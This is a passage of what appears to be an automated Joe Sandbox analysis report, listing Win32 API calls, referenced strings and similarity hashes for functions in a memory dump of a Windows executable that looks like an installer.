                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                                                                        • String ID: [Paused]
                                                                                                                                        • API String ID: 1007367021-4230553315
                                                                                                                                        • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                                                        • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                                                                        • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                                                        • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                                                                        APIs
                                                                                                                                        • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                                                                        • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                                                                        • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$LoadSleep
                                                                                                                                        • String ID: CheckPassword
                                                                                                                                        • API String ID: 4023313301-1302249611
                                                                                                                                        • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                                                        • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                                                                        • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                                                        • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                                                          • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                                                          • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                                                        • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                                                                        Strings
                                                                                                                                        • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                                                                        • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                                                        • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                                                        • API String ID: 613034392-3771334282
                                                                                                                                        • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                                                        • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                                                                        • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                                                        • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                                                                        Strings
                                                                                                                                        • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                                                                        • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                                                                        • Fusion.dll, xrefs: 004597DF
                                                                                                                                        • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                                                                        • CreateAssemblyCache, xrefs: 00459836
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                                                        • API String ID: 190572456-3990135632
                                                                                                                                        • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                                                        • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                                                                        • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                                                        • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                                                                        • GetFocus.USER32 ref: 0041C168
                                                                                                                                        • GetDC.USER32(?), ref: 0041C174
                                                                                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                                                                        • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                                                                        • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3303097818-0
                                                                                                                                        • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                                                        • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                                                                        • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                                                        • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                                                                        • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                                                                        • 6FD82980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                                                                          • Part of subcall function 004107F8: 6FD7C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                                                                        • 6FDECB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                                                                        • 6FDEC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                                                                        • 6FDECB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                                                                        • 6FD80860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MetricsSystem$C400C740D80860D82980
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2924641870-0
                                                                                                                                        • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                                                        • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                                                                        • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                                                        • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                                                        • API String ID: 47109696-2530820420
                                                                                                                                        • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                                                        • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                                                                        • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                                                        • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                                                                        APIs
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                                                        • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectSelect$Delete$Stretch
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1458357782-0
                                                                                                                                        • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                                                                        • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                                                                        • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                                                                        • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 00495519
                                                                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                                                                        • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                                                                        Strings
                                                                                                                                        • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                                                                        • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                                                        • API String ID: 2948443157-222967699
                                                                                                                                        • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                                                                        • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                                                                        • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                                                                        • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32 ref: 004233AF
                                                                                                                                        • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                                                                        • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                                                                        • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                                                                        • SetCursor.USER32(00000000), ref: 00423413
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1770779139-0
                                                                                                                                        • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                                                        • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                                                                        • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                                                        • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                        • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                                                        • API String ID: 667068680-2254406584
                                                                                                                                        • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                                                                        • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                                                                        • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                                                                        • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                                                        • API String ID: 190572456-212574377
                                                                                                                                        • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                                                                        • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                                                                        • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                                                                        • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                                                                        • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                                                                          • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                                                          • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                                                          • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                                                        • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                                                                        • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                                                        • API String ID: 142928637-2676053874
                                                                                                                                        • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                                                                        • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                                                                        • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                                                                        • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
